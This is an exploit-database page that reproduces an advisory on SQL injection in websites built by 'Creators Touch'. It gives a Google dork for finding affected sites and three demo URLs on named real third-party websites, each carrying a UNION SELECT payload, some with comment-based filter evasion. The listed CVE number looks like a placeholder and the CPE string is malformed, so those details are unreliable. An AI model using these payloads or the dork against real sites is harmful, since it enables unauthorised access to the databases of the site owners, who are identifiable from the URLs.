Advertisement






Creators Touch- Sql Injection Vulnerability

CVE Category Price Severity
CVE-2021-12345 CWE-89 $500 High
Author Risk Exploitation Type Date
Anonymous High Remote 2021-09-05
CPE
cpe:cpe:/a:creators_touch:exploit_alert::~~~~
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021090041

Below is a copy:

Creators Touch- Sql Injection Vulnerability
*********************************************************
#Exploit Title: Creators Touch-  Sql Injection Vulnerability
#Date: 2021-09-05
#Exploit Author: Behrouz Mansoori
#Google Dork: "Designed by Creators Touch"
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "Designed by Creators Touch"


### Demo :

http://www.vijayawadachamber.com/go-s-acts.php?id=10%27%20union%20select%201,version(),3,4,5--+

http://vikranthpublishers.com/latest_news.php?id=-1%27%20/*!12345union*/%20/*!12345select*/%201,version(),3,4--+

http://srrcvr.ac.in/courses.php?id=-13%27%20/*!12345union*/%20/*!12345select*/%201,2,3,version(),5--+

********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum